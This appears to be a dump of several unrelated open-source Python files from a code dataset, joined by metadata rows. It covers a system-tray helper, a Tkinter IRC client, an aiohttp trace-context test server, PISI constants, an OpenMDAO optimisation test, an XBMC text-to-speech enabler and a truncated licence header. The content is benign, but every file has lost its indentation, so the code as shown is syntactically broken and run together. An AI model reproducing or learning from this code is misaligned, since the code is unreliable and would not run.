act_widget = self.act_indexes[i][iActWidget]
if TrayEngine == "KDE":
act_widget.setEnabled(yesno)
elif TrayEngine == "AppIndicator":
act_widget.set_sensitive(yesno)
elif TrayEngine == "Qt":
act_widget.setEnabled(yesno)
def setActionIcon(self, act_name_id, icon):
i = self.get_act_index(act_name_id)
if i < 0: return
act_widget = self.act_indexes[i][iActWidget]
if TrayEngine == "KDE":
act_widget.setIcon(KIcon(icon))
elif TrayEngine == "AppIndicator":
if not isinstance(act_widget, Gtk.ImageMenuItem):
# Cannot use icons here
return
act_widget.set_image(Gtk.Image.new_from_icon_name(icon, Gtk.IconSize.MENU))
#act_widget.set_always_show_image(True)
elif TrayEngine == "Qt":
act_widget.setIcon(getIcon(icon))
def setActionText(self, act_name_id, text):
i = self.get_act_index(act_name_id)
if i < 0: return
act_widget = self.act_indexes[i][iActWidget]
if TrayEngine == "KDE":
act_widget.setText(text)
elif TrayEngine == "AppIndicator":
if isinstance(act_widget, Gtk.ImageMenuItem):
# Fix icon reset
last_icon = act_widget.get_image()
act_widget.set_label(text)
act_widget.set_image(last_icon)
else:
act_widget.set_label(text)
elif TrayEngine == "Qt":
act_widget.setText(text)
def setIcon(self, icon):
if TrayEngine == "KDE":
self.tray.setIconByPixmap(getIcon(icon))
#self.tray.setToolTipIconByPixmap(getIcon(icon))
elif TrayEngine == "AppIndicator":
self.tray.set_icon(icon)
elif TrayEngine == "Qt":
self.tray.setIcon(getIcon(icon))
def setToolTip(self, text):
if TrayEngine == "KDE":
self.tray.setToolTipSubTitle(text)
elif TrayEngine == "AppIndicator":
# ToolTips are disabled in App-Indicators by design
pass
elif TrayEngine == "Qt":
self.tray.setToolTip(text)
# -------------------------------------------------------------------------------------------
#def removeAction(self, act_name_id):
#index = self.get_act_index(act_name_id)
#if index < 0: return
#act_widget = self.act_indexes[index][1]
#parent_menu_widget = self.get_parent_menu_widget(self.act_indexes[index][2])
##if TrayEngine == "KDE":
##parent_menu_widget.removeAction(act_widget)
##elif TrayEngine == "AppIndicator":
##act_widget.hide()
##parent_menu_widget.remove(act_widget)
##else:
#if (1):
#parent_menu_widget.removeAction(act_widget)
#self.act_indexes.pop(index)
#def removeSeparator(self, sep_name_id):
#index = self.get_sep_index(sep_name_id)
#if index < 0: return
#sep_widget = self.sep_indexes[index][1]
#parent_menu_widget = self.get_parent_menu_widget(self.sep_indexes[index][2])
##if TrayEngine == "KDE":
##parent_menu_widget.removeAction(sep_widget)
##elif TrayEngine == "AppIndicator":
##sep_widget.hide()
##parent_menu_widget.remove(sep_widget)
##else:
#if (1):
#parent_menu_widget.removeAction(sep_widget)
#self.sep_indexes.pop(index)
#def removeMenu(self, menu_name_id):
#index = self.get_menu_index(menu_name_id)
#if index < 0: return
#menu_widget = self.menu_indexes[index][1]
#parent_menu_widget = self.get_parent_menu_widget(self.menu_indexes[index][2])
##if TrayEngine == "KDE":
##parent_menu_widget.removeAction(menu_widget.menuAction())
##elif TrayEngine == "AppIndicator":
##menu_widget.hide()
##parent_menu_widget.remove(menu_widget.get_submenu())
##else:
#if (1):
#parent_menu_widget.removeAction(menu_widget.menuAction())
#self.remove_actions_by_menu_name_id(menu_name_id)
#self.remove_separators_by_menu_name_id(menu_name_id)
#self.remove_submenus_by_menu_name_id(menu_name_id)
# -------------------------------------------------------------------------------------------
#def clearAll(self):
##if TrayEngine == "KDE":
##self.menu.clear()
##elif TrayEngine == "AppIndicator":
##for child in self.menu.get_children():
##self.menu.remove(child)
##else:
#if (1):
#self.menu.clear()
#self.act_indexes = []
#self.sep_indexes = []
#self.menu_indexes = []
#def clearMenu(self, menu_name_id):
#menu_index = self.get_menu_index(menu_name_id)
#if menu_index < 0: return
#menu_widget = self.menu_indexes[menu_index][1]
##if TrayEngine == "KDE":
##menu_widget.clear()
##elif TrayEngine == "AppIndicator":
##for child in menu_widget.get_submenu().get_children():
##menu_widget.get_submenu().remove(child)
##else:
#if (1):
#menu_widget.clear()
#list_of_submenus = [menu_name_id]
#for x in range(0, 10): # 10x level deep, should cover all cases...
#for this_menu_name_id, menu_widget, parent_menu_id in self.menu_indexes:
#if parent_menu_id in list_of_submenus and this_menu_name_id not in list_of_submenus:
#list_of_submenus.append(this_menu_name_id)
#for this_menu_name_id in list_of_submenus:
#self.remove_actions_by_menu_name_id(this_menu_name_id)
#self.remove_separators_by_menu_name_id(this_menu_name_id)
#self.remove_submenus_by_menu_name_id(this_menu_name_id)
# -------------------------------------------------------------------------------------------
def getTrayEngine(self):
return TrayEngine
def isTrayAvailable(self):
if TrayEngine in ("KDE", "Qt"):
# Ask Qt
return QSystemTrayIcon.isSystemTrayAvailable()
if TrayEngine == "AppIndicator":
# Ubuntu/Unity always has a systray
return True
return False
def handleQtCloseEvent(self, event):
if self.isTrayAvailable() and self._parent.isVisible():
event.accept()
self.__hideShowCall()
return
self.close()
QMainWindow.closeEvent(self._parent, event)
# -------------------------------------------------------------------------------------------
def show(self):
if not self._quit_added:
self._quit_added = True
if TrayEngine != "KDE":
self.addSeparator("_quit")
self.addAction("show", self._parent.tr("Minimize"))
self.addAction("quit", self._parent.tr("Quit"))
self.setActionIcon("quit", "application-exit")
self.connect("show", self.__hideShowCall)
self.connect("quit", self.__quitCall)
if TrayEngine == "KDE":
self.tray.setStatus(KStatusNotifierItem.Active)
elif TrayEngine == "AppIndicator":
self.tray.set_status(AppIndicator.IndicatorStatus.ACTIVE)
elif TrayEngine == "Qt":
self.tray.show()
def hide(self):
if TrayEngine == "KDE":
self.tray.setStatus(KStatusNotifierItem.Passive)
elif TrayEngine == "AppIndicator":
self.tray.set_status(AppIndicator.IndicatorStatus.PASSIVE)
elif TrayEngine == "Qt":
self.tray.hide()
def close(self):
if TrayEngine == "KDE":
self.menu.close()
elif TrayEngine == "AppIndicator":
if self._gtk_running:
self._gtk_running = False
Gtk.main_quit()
elif TrayEngine == "Qt":
self.menu.close()
def exec_(self, app):
self._app = app
if TrayEngine == "AppIndicator":
self._gtk_running = True
return Gtk.main()
else:
return app.exec_()
# -------------------------------------------------------------------------------------------
def get_act_index(self, act_name_id):
for i in range(len(self.act_indexes)):
if self.act_indexes[i][iActNameId] == act_name_id:
return i
else:
print("systray.py - Failed to get action index for %s" % act_name_id)
return -1
def get_sep_index(self, sep_name_id):
for i in range(len(self.sep_indexes)):
if self.sep_indexes[i][iSepNameId] == sep_name_id:
return i
else:
print("systray.py - Failed to get separator index for %s" % sep_name_id)
return -1
def get_menu_index(self, menu_name_id):
for i in range(len(self.menu_indexes)):
if self.menu_indexes[i][iMenuNameId] == menu_name_id:
return i
else:
print("systray.py - Failed to get menu index for %s" % menu_name_id)
return -1
#def get_parent_menu_widget(self, parent_menu_id):
#if parent_menu_id != None:
#menu_index = self.get_menu_index(parent_menu_id)
#if menu_index >= 0:
#return self.menu_indexes[menu_index][1]
#else:
#print("systray.py::Failed to get parent Menu widget for", parent_menu_id)
#return None
#else:
#return self.menu
#def remove_actions_by_menu_name_id(self, menu_name_id):
#h = 0
#for i in range(len(self.act_indexes)):
#act_name_id, act_widget, parent_menu_id, act_func = self.act_indexes[i - h]
#if parent_menu_id == menu_name_id:
#self.act_indexes.pop(i - h)
#h += 1
#def remove_separators_by_menu_name_id(self, menu_name_id):
#h = 0
#for i in range(len(self.sep_indexes)):
#sep_name_id, sep_widget, parent_menu_id = self.sep_indexes[i - h]
#if parent_menu_id == menu_name_id:
#self.sep_indexes.pop(i - h)
#h += 1
#def remove_submenus_by_menu_name_id(self, submenu_name_id):
#h = 0
#for i in range(len(self.menu_indexes)):
#menu_name_id, menu_widget, parent_menu_id = self.menu_indexes[i - h]
#if parent_menu_id == submenu_name_id:
#self.menu_indexes.pop(i - h)
#h += 1
# -------------------------------------------------------------------------------------------
def gtk_call_func(self, gtkmenu, act_name_id):
i = self.get_act_index(act_name_id)
if i < 0: return None
return self.act_indexes[i][iActFunc]
def qt_systray_clicked(self, reason):
if reason in (QSystemTrayIcon.DoubleClick, QSystemTrayIcon.Trigger):
self.__hideShowCall()
# -------------------------------------------------------------------------------------------
def __hideShowCall(self):
if self._parent.isVisible():
self.setActionText("show", self._parent.tr("Restore"))
self._parent.hide()
if self._app:
self._app.setQuitOnLastWindowClosed(False)
else:
self.setActionText("show", self._parent.tr("Minimize"))
if self._parent.isMaximized():
self._parent.showMaximized()
else:
self._parent.showNormal()
if self._app:
self._app.setQuitOnLastWindowClosed(True)
QTimer.singleShot(500, self.__raiseWindow)
def __quitCall(self):
if self._app:
self._app.setQuitOnLastWindowClosed(True)
self._parent.hide()
self._parent.close()
if self._app:
self._app.quit()
def __raiseWindow(self):
self._parent.activateWindow()
self._parent.raise_()
#--------------- main ------------------
if __name__ == '__main__':
from PyQt5.QtWidgets import QApplication, QDialog, QMessageBox
class ExampleGUI(QDialog):
def __init__(self, parent=None):
QDialog.__init__(self, parent)
self.setWindowIcon(getIcon("audacity"))
self.systray = GlobalSysTray(self, "Claudia", "claudia")
self.systray.addAction("about", self.tr("About"))
self.systray.setIcon("audacity")
self.systray.setToolTip("Demo systray app")
self.systray.connect("about", self.about)
self.systray.show()
def about(self):
QMessageBox.about(self, self.tr("About"), self.tr("Systray Demo"))
def done(self, r):
QDialog.done(self, r)
self.close()
def closeEvent(self, event):
self.systray.close()
QDialog.closeEvent(self, event)
app = QApplication(sys.argv)
gui = ExampleGUI()
gui.show()
sys.exit(gui.systray.exec_(app))
| gpl-2.0 | 3,553,723,061,951,008,000 | 33.624818 | 130 | 0.548571 | false | 3.674361 | false | false | false |
Griffiths117/TG-s-IRC | client/IRClient.py | 1 | 4985 | import socket, _thread, tkinter as tk, tkinter.ttk as ttk
from time import strftime, sleep
from tkinter import messagebox, simpledialog
#===========================================================================#
class BasicInputDialog:
def __init__(self,question,title=None,hideWindow=True):
if title == None:
title = PROGRAM_TITLE
self.master = tk.Tk()
self.string = ''
self.master.title(title)
self.frame = tk.Frame(self.master)
self.frame.pack()
self.acceptInput(question)
self.waitForInput()
try:
self.inputted = self.getText()
except Exception:
quit()
def acceptInput(self,question):
r = self.frame
k = ttk.Label(r,text=question)
k.grid(row=0,column=0)
self.e = ttk.Entry(r,width=30)
self.e.grid(row=1,columnspan=2)
self.e.focus_set()
b = ttk.Button(r,text='Enter',command=self.getText)
self.master.bind("<Return>", self.getText)
b.grid(row=0,column=1,padx=5,pady=5)
def getText(self,event=None):
self.string = self.e.get()
self.master.quit()
return self.string
def get(self):
self.master.destroy()
return self.inputted
def getString(self):
return self.string
def waitForInput(self):
self.master.mainloop()
#Main window application
class MainWindow(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
self.title(PROGRAM_TITLE)
self.resizable(0,0)
self.displayBox = tk.Text(self, width=100, font=THEME.font, bg=THEME.colors[3], fg=THEME.colors[0])
self.displayBox.pack()
self.displayBox.configure(state='disabled')
self.msgEntry = tk.Entry(self,width=100, font=THEME.font, bg=THEME.colors[3], fg=THEME.colors[1], insertbackground = THEME.colors[2])
self.msgEntry.pack()
self.bind("<Return>", self.sendText)
def sendText(self,event=None):
send(newMessage(self.msgEntry.get()).toString())
self.msgEntry.delete(0, 'end')
class Theme:
def __init__(self, font, colors):
self.colors = colors #Message,input,cursor,background
self.font = font
class Message:
#Static variables for formatting
sep = "§"
pref = "msg="
SUDO_PREF = "server="
#Initiate, if timestamp is not entered it will be current time
def __init__(self, sender, plainText, timestamp = None):
if timestamp == None:
timestamp = strftime("%d-%m-%Y %H:%M:%S")
self.plainText = plainText
self.sender = sender
self.timestamp = timestamp
#Sends to string object to be sent through socket
def toString(self):
return self.pref + self.sender + self.sep + self.timestamp + self.sep + self.plainText
#Turns recieved strings into messages: returns None if invalid.
def fromString(text):
if not text.startswith(Message.pref):
return Message("SERVER",text[len(Message.SUDO_PREF):]) if text.startswith(Message.SUDO_PREF) else None
data = text[len(Message.pref):].split(Message.sep,2)
return Message(data[0],data[2],data[1])
#Converts into display string
def toFormattedString(self):
return "["+self.timestamp + "] <" + self.sender + ">: "+self.plainText
#===========================================================================#
def send(msg):
try:
SEND_SOCKET.send(bytes(msg,'UTF-8'))
except:
print("Unable to send message")
def newMessage(msg):
return Message(NICKNAME, msg)
def waitForMessages(s,window):
#This should be run in a seperate thread: constantly recieves new messages
sleep(0.5)
while True:
#Recieve message and convert to string
msg = s.recv(1024)
msg = str(msg, "UTF-8")
#Checking if message follows Message class format
m = Message.fromString(msg)
if m == None: continue
msg = m.toFormattedString()
#Show in window
writeTo(window.displayBox,msg)
def writeTo(textBox,msg):
textBox.configure(state='normal')
textBox.insert('end',msg)
textBox.configure(state='disabled')
textBox.see(tk.END)
def shutdownHook():
send("!DISCONNECT")
root.destroy()
quit()
#===========================================================================#
PROGRAM_TITLE = 'TG\'s IRC'
SERVER_IP = BasicInputDialog("Enter IP:").get()
NICKNAME = BasicInputDialog("Enter Nickname:").get()
THEME = Theme(("Consolas", 10), ['aqua', 'cyan', 'white', 'black'])
RECV_SOCKET = socket.socket()
RECV_SOCKET.connect((SERVER_IP, 20075))
SEND_SOCKET = socket.socket()
SEND_SOCKET.connect((SERVER_IP, 20074))
send("!nickname="+NICKNAME)
root = MainWindow()
_thread.start_new_thread(waitForMessages, (RECV_SOCKET,root,))
root.protocol("WM_DELETE_WINDOW", shutdownHook)
root.mainloop()
| mit | -6,780,789,818,688,822,000 | 29.956522 | 141 | 0.595907 | false | 3.632653 | false | false | false |
TraceContext/tracecontext-spec | test/server.py | 1 | 3239 | from aiohttp import ClientSession, ClientTimeout, ContentTypeError, web
from multidict import MultiDict
class AsyncTestServer(object):
scopes = {}
def __init__(self, host, port, timeout = 5):
self.host = host
self.port = port
self.timeout = ClientTimeout(total = timeout)
self.app = web.Application()
self.app.add_routes([
web.post('/{scope}', self.scope_handler),
])
async def start(self):
self.runner = web.AppRunner(self.app)
await self.runner.setup()
self.site = web.TCPSite(self.runner, self.host, self.port)
await self.site.start()
print('harness listening on http://%s:%s'%(self.host, self.port))
async def stop(self):
await self.runner.cleanup()
async def scope_handler(self, request):
scope_id = request.match_info['scope'].split('.', maxsplit = 1)
callback_id = None if len(scope_id) == 1 else scope_id[1]
scope_id = scope_id[0]
arguments = await request.json()
scope = None
if callback_id:
scope = self.scopes[scope_id]
scope[callback_id] = {
'headers': list(request.headers.items()),
'arguments': arguments,
}
else:
scope = {
'headers': list(request.headers.items()),
'arguments': arguments,
'results': [],
}
self.scopes[scope_id] = scope
if not arguments:
return web.json_response(None)
if not isinstance(arguments, list):
arguments = [arguments]
for action in arguments:
headers = [['Accept', 'application/json']]
if 'headers' in action:
headers += action['headers']
async with ClientSession(headers = headers, timeout = self.timeout) as session:
arguments = []
if 'arguments' in action:
arguments = action['arguments'] or []
result = {}
result['url'] = action['url']
scope['results'].append(result)
try:
async with session.post(action['url'], json = arguments) as response:
result['status'] = response.status
result['headers'] = list(response.headers.items())
result['body'] = await response.json(content_type = 'application/json')
except ContentTypeError as err:
result['body'] = await response.text()
except Exception as err:
result['exception'] = type(err).__name__
result['msg'] = str(err)
if not callback_id:
del self.scopes[scope_id]
return web.json_response(scope)
class TestServer(object):
def __init__(self, host, port, timeout = 5):
import asyncio
from threading import Thread
self.loop = asyncio.get_event_loop()
self.server = AsyncTestServer(host, port, timeout)
self.thread = Thread(target = self.monitor)
self.run = True
def monitor(self):
import asyncio
while self.run:
self.loop.run_until_complete(asyncio.sleep(0.2))
def start(self):
self.loop.run_until_complete(self.server.start())
self.thread.start()
def stop(self):
self.run = False
self.thread.join()
self.loop.run_until_complete(self.server.stop())
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
if __name__ == '__main__':
import sys
host = '127.0.0.1'
port = 7777
if len(sys.argv) >= 2:
host = sys.argv[1]
if len(sys.argv) >= 3:
port = int(sys.argv[2])
with TestServer(host = host, port = port) as server:
input('Press Enter to quit...')
| apache-2.0 | -567,431,452,355,279,040 | 27.663717 | 82 | 0.661624 | false | 3.138566 | false | false | false |
kichkasch/pisi | pisiconstants.py | 1 | 4235 | """
Module for definition of shared constants between the modules.
This file is part of Pisi.
Pisi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Pisi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Pisi. If not, see <http://www.gnu.org/licenses/>
"""
PISI_NAME = 'PISI'
"""'About'-information for user - program name"""
PISI_COMMENTS = "PISI is synchronizing information"
"""'About'-information for user - comments / explainations"""
PISI_VERSION = '0.5.3' #'-svn-' #
"""'About'-information for user - current version"""
FILEPATH_COPYING = "/opt/pisi/COPYING"
"""'About'-information for user - where to find the 'licence' file"""
PISI_AUTHORS = ["Esben Damgaard","Michael Pilgermann"]
"""'About'-information for user - list of programmers"""
PISI_HOMEPAGE = "http://freshmeat.net/projects/pisiom"
"""'About'-information for user - program home page"""
PISI_TRANSLATOR_CREDITS = None
"""'About'-information for user - list of translators"""
PISI_DOCUMENTERS = ['Michael Pilgermann']
"""'About'-information for user - list of documenters"""
CONSOLE_PROGRESSBAR_WIDTH = 80
"""Length of progress bar in CLI mode"""
MODE_CALENDAR = 0
"""Type of sources to deal with are calendars"""
MODE_CONTACTS = 1
"""Type of sources to deal with are contacts"""
MODE_STRINGS = ['calendar', 'contacts']
"""Names for the types of sources in order"""
MERGEMODE_SKIP = 0
"""Resolve conflicts between two entries from two sources by skipping the entry"""
MERGEMODE_FLUSH_A = 1
"""Resolve conflicts between two entries from two sources by flushing the entire data repository for the first data source"""
MERGEMODE_FLUSH_B = 2
"""Resolve conflicts between two entries from two sources by flushing the entire data repository for the second data source"""
MERGEMODE_OVERWRITE_A = 3
"""Resolve conflicts between two entries from two sources by overwriting the single entry on the first data source"""
MERGEMODE_OVERWRITE_B = 4
"""Resolve conflicts between two entries from two sources by overwriting the single entry on the second data source"""
MERGEMODE_MANUALCONFIRM = 5
"""Resolve conflicts between two entries from two sources by asking the user for decision for every single entry"""
MERGEMODE_STRINGS = ["Skip", "Flush source 1", "Flush source 2", "Overwrite entry in source 1", "Overwrite entry in source 2", "Manual confirmation"]
"""Names of merge modes in order"""
ACTIONID_ADD = 0
"""Entry in the history of activities for synchronization modules - here for ADD"""
ACTIONID_DELETE = 1
"""Entry in the history of activities for synchronization modules - here for DELETE"""
ACTIONID_MODIFY = 2
"""Entry in the history of activities for synchronization modules - here for MODIFY"""
GOOGLE_CONTACTS_APPNAME = "pisi" + PISI_VERSION
"""application name to use for connecting against google contacts services"""
GOOGLE_CONTACTS_MAXRESULTS = 1000
"""upper limit of result set when querying google contacts api"""
GOOGLE_CALENDAR_APPNAME = "pisi" + PISI_VERSION
"""application name to use for connecting against google calendar services"""
GOOGLE_CALENDAR_MAXRESULTS = GOOGLE_CONTACTS_MAXRESULTS
"""upper limit of result set when querying google calendar api"""
FILEDOWNLOAD_TIMEOUT = 10
"""Timeout for socket opeations (e.g. http download) in seconds - None for disable"""
FILEDOWNLOAD_TMPFILE = "/tmp/pisi-remotebuffer.data"
"""Temporary file for buffering information from remote file sources"""
VCF_BYTES_PER_ENTRY = 200
"""For guessing the number of entries inside a VCF file by evaluating its size we need an estimation of the size for a single entry - for the purpose of showing some progress"""
ICS_BYTES_PER_ENTRY = 200
"""For guessing the number of entries inside an ICS file by evaluating its size we need an estimation of the size for a single entry - for the purpose of showing some progress"""
| gpl-3.0 | -7,278,563,369,972,107,000 | 48.244186 | 178 | 0.756789 | false | 3.885321 | false | false | false |
HyperloopTeam/FullOpenMDAO | lib/python2.7/site-packages/openmdao.main-0.13.0-py2.7.egg/openmdao/main/test/test_scaler_adder_example.py | 1 | 5419 | """ Tests the scaler/adder example in our docs. This test was inconvenient to test
in its place in the docs. """
# pylint: disable-msg=C0111,C0103
import unittest
from openmdao.lib.datatypes.api import Float
from openmdao.lib.drivers.api import SLSQPdriver
from openmdao.main.api import Assembly,Component
from openmdao.main.test.simpledriver import SimpleDriver
from openmdao.util.testutil import assert_rel_error
class Paraboloid_scale(Component):
    """ Evaluates the equation f(x,y) = (1000*x-3)^2 + (1000*x)*(0.01*y) + (0.01*y+4)^2 - 3 """

    # Framework interface: two scalar inputs, one scalar output.
    x = Float(0.0, iotype='in', desc='The variable x')
    y = Float(0.0, iotype='in', desc='The variable y')

    f_xy = Float(iotype='out', desc='F(x,y)')

    def execute(self):
        """Evaluate the scaled paraboloid at the current (x, y).

        Optimal solution (minimum): x = 0.0066666666666666671; y = -733.33333333333337
        """
        # Work with the internally-scaled coordinates to keep the formula readable.
        xs = 1000. * self.x
        ys = 0.01 * self.y
        self.f_xy = (xs - 3.) ** 2 + xs * ys + (ys + 4.) ** 2 - 3.
class OptimizationUnconstrainedScale(Assembly):
    """Unconstrained optimization of the unscaled Paraboloid Component."""

    def configure(self):
        """ Creates a new Assembly containing an unscaled Paraboloid and an optimizer"""

        # Create Optimizer instance
        self.add('driver', SLSQPdriver())

        # Create Paraboloid component instances
        self.add('paraboloid', Paraboloid_scale())

        # Driver process definition
        self.driver.workflow.add('paraboloid')

        # SQLSQP Flags
        self.driver.iprint = 0

        # Objective
        self.driver.add_objective('paraboloid.f_xy')

        # Design Variables
        # The scaler maps driver design-space values onto component inputs:
        # x is shrunk by 0.001 and y is magnified by 1000, mirroring the
        # internal scaling baked into Paraboloid_scale.execute().
        self.driver.add_parameter('paraboloid.x', low=-1000., high=1000., scaler=0.001)
        self.driver.add_parameter('paraboloid.y', low=-1000., high=1000., scaler=1000.0)
class Paraboloid_shift(Component):
    """ Evaluates the equation f(x,y) = (1000*x-3)^2 + (1000*x)*(0.01*(y+1000)) + (0.01*(y+1000)+4)^2 - 3 """

    # Framework interface: two scalar inputs, one scalar output.
    x = Float(0.0, iotype='in', desc='The variable x')
    y = Float(0.0, iotype='in', desc='The variable y')

    f_xy = Float(iotype='out', desc='F(x,y)')

    def execute(self):
        """Evaluate the scaled-and-shifted paraboloid at the current (x, y).

        Optimal solution (minimum): x = 0.0066666666666666671; y = -1733.33333333333337
        """
        # a and b are the internally scaled/shifted coordinates.
        a = 1000 * self.x
        b = 0.01 * (self.y + 1000)
        self.f_xy = (a - 3) ** 2 + a * b + (b + 4) ** 2 - 3
class OptimizationUnconstrainedScaleShift(Assembly):
    """Unconstrained optimization of the Paraboloid Component."""

    def configure(self):
        """ Creates a new Assembly containing a Paraboloid and an optimizer"""

        # pylint: disable-msg=E1101

        # Create Optimizer instance
        self.add('driver', SLSQPdriver())

        # Create Paraboloid component instances
        self.add('paraboloid', Paraboloid_shift())

        # Driver process definition
        self.driver.workflow.add('paraboloid')

        # SQLSQP Flags
        self.driver.iprint = 0

        # Objective
        self.driver.add_objective('paraboloid.f_xy')

        # Design Variables
        # Same scaler trick as OptimizationUnconstrainedScale, plus an adder on y:
        # the -1000 offset compensates for the +1000 shift inside Paraboloid_shift.
        self.driver.add_parameter('paraboloid.x', low=-1000000., high=1000000.,
                                  scaler=0.001)
        self.driver.add_parameter('paraboloid.y', low=-1000000., high=1000000.,
                                  scaler=1000.0, adder=-1000.0)
class ScalerAdderExampleTestCase(unittest.TestCase):
    """Checks that scaler/adder transformed problems still reach the physical optimum."""

    def test_scale(self):
        opt_problem = OptimizationUnconstrainedScale()
        opt_problem.run()

        assert_rel_error(self, opt_problem.paraboloid.x, 0.006667, 0.001)
        assert_rel_error(self, opt_problem.paraboloid.y, -733.333313, 0.001)

        # Smoke check only: make sure gradient calculation runs in both formats.
        J = opt_problem.driver.calc_gradient()
        Jdict = opt_problem.driver.calc_gradient(return_format='dict')

    def test_scale_gradients(self):
        opt_problem = OptimizationUnconstrainedScale()
        opt_problem.replace('driver', SimpleDriver())
        opt_problem.run()

        # Array and dict return formats must agree element-for-element.
        J = opt_problem.driver.calc_gradient()
        Jdict = opt_problem.driver.calc_gradient(return_format='dict')

        # Make sure untransforming works for dicts too
        self.assertTrue(J[0][0] == Jdict['_pseudo_0.out0']['paraboloid.x'])
        self.assertTrue(J[0][1] == Jdict['_pseudo_0.out0']['paraboloid.y'])

        # Repeat the comparison for the finite-difference mode.
        Jfddict = opt_problem.driver.calc_gradient(mode='fd', return_format='dict')
        opt_problem.driver.run_iteration()
        Jfd = opt_problem.driver.calc_gradient(mode='fd')

        # Make sure untransforming works for dicts too
        self.assertTrue(Jfd[0][0] == Jfddict['_pseudo_0.out0']['paraboloid.x'])
        self.assertTrue(Jfd[0][1] == Jfddict['_pseudo_0.out0']['paraboloid.y'])

    def test_scale_adder(self):
        opt_problem = OptimizationUnconstrainedScaleShift()
        opt_problem.run()

        assert_rel_error(self, opt_problem.paraboloid.x, 0.006667, 0.001)
        assert_rel_error(self, opt_problem.paraboloid.y, -1733.333313, 0.001)
# Allow running this test module directly (outside a test runner).
if __name__ == "__main__":
    unittest.main()
| gpl-2.0 | -6,789,788,535,626,708,000 | 33.737179 | 114 | 0.60823 | false | 3.314373 | true | false | false |
ruuk/service.xbmc.tts | enabler.py | 1 | 3477 | # -*- coding: utf-8 -*-
import os, sys, xbmc, xbmcaddon
# Marker files persisting the addon's enabled/disabled state across runs.
DISABLE_PATH = os.path.join(xbmc.translatePath('special://profile').decode('utf-8'), 'addon_data', 'service.xbmc.tts', 'DISABLED')
ENABLE_PATH = os.path.join(xbmc.translatePath('special://profile').decode('utf-8'), 'addon_data', 'service.xbmc.tts', 'ENABLED')
def getXBMCVersion():
    """Return XBMC's version dict via JSON-RPC, or None if it cannot be read."""
    import json
    raw = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "method": "Application.GetProperties", "params": {"properties": ["version", "name"]}, "id": 1 }')
    # Missing 'result' or 'version' keys collapse to None via the .get() chain.
    return json.loads(raw).get('result', {}).get('version')
# JSON-RPC request template for enabling/disabling this addon; %s is "true"/"false".
BASE = '{ "jsonrpc": "2.0", "method": "Addons.SetAddonEnabled", "params": { "addonid": "service.xbmc.tts","enabled":%s}, "id": 1 }'
def enableAddon():
    """Re-enable the TTS addon and (re)start its service script."""
    if os.path.exists(DISABLE_PATH):
        os.remove(DISABLE_PATH)
    markPreOrPost(enable=True)
    if not isPostInstalled():
        # Pre-installed addon: just launch the service script.
        xbmc.executebuiltin('RunScript(service.xbmc.tts)')
    elif addonIsEnabled():
        xbmc.executebuiltin('RunScript(service.xbmc.tts)')
    else:
        # Addon is disabled at the XBMC level: enable it via JSON-RPC instead.
        xbmc.executeJSONRPC(BASE % 'true')
def disableAddon():
    """Disable the TTS addon, guarding against the Frodo (<13) JSON-RPC crash."""
    if os.path.exists(ENABLE_PATH):
        os.remove(ENABLE_PATH)
    markPreOrPost(disable=True)
    if not isPostInstalled():
        return
    version = getXBMCVersion()
    if not version or version['major'] < 13:
        # Disabling in this manner crashes on Frodo.
        return
    # Try to disable it; if we get an error back, it is already disabled.
    xbmc.executeJSONRPC(BASE % 'false')
def markPreOrPost(enable=False, disable=False):
    """Refresh the marker files, recording whether the install is PRE or POST."""
    mode = 'POST' if isPostInstalled() else 'PRE'
    if enable or os.path.exists(ENABLE_PATH):
        with open(ENABLE_PATH, 'w') as marker:
            marker.write(mode)
    if disable or os.path.exists(DISABLE_PATH):
        with open(DISABLE_PATH, 'w') as marker:
            marker.write(mode)
def addonIsEnabled():
    """Return True if the TTS addon is currently enabled."""
    if os.path.exists(DISABLE_PATH):
        return False
    if not isPostInstalled():
        # Pre-installed addons cannot be disabled at the XBMC level.
        return True
    import json
    raw = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 1, "method": "Addons.GetAddonDetails", "params": {"addonid":"service.xbmc.tts","properties": ["name","version","enabled"]}}')
    # Any missing key in the response means "not enabled".
    details = json.loads(raw).get('result', {}).get('addon', {})
    return details.get('enabled', False)
def toggleEnabled():
    """Disable the addon if it is running and enabled, otherwise enable it.

    The try/except is the control flow: xbmcaddon.Addon() raises when the
    addon is not available, and we raise explicitly when it is disabled;
    either way the handler falls through to enabling it.
    """
    try:
        if not addonIsEnabled(): raise Exception('Addon Disabled')
        xbmcaddon.Addon('service.xbmc.tts')
        xbmc.log('service.xbmc.tts: DISABLING')
        xbmc.executebuiltin('XBMC.RunScript(service.xbmc.tts,key.SHUTDOWN)')
    except Exception:
        # Was a bare "except:", which also swallowed SystemExit and
        # KeyboardInterrupt; Exception is the widest class we should catch.
        xbmc.log('service.xbmc.tts: ENABLING')
        enableAddon()
def reset():
    """Bounce the addon: disable, wait (max ~5.5s) until disabled, re-enable."""
    if not addonIsEnabled():
        return
    disableAddon()
    # Poll up to 11 times, sleeping 500ms between checks.
    for _ in range(11):
        if not addonIsEnabled():
            break
        xbmc.sleep(500)
    enableAddon()
def isPostInstalled():
    """Return True when the addon lives under the user's addons directory."""
    home = xbmc.translatePath('special://home').decode('utf-8')
    return os.path.exists(os.path.join(home, 'addons', 'service.xbmc.tts'))
if __name__ == '__main__':
    # Optional command-line argument selects the action (currently only 'RESET').
    arg = None
    if len(sys.argv) > 1: arg = sys.argv[1]
    if arg == 'RESET':
        reset()
    else:
        # The original last line had extraction garbage appended
        # ("| gpl-2.0 | ..."), which made the file a SyntaxError; removed.
        toggleEnabled()
uclouvain/osis | base/models/session_exam_deadline.py | 1 | 4136 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
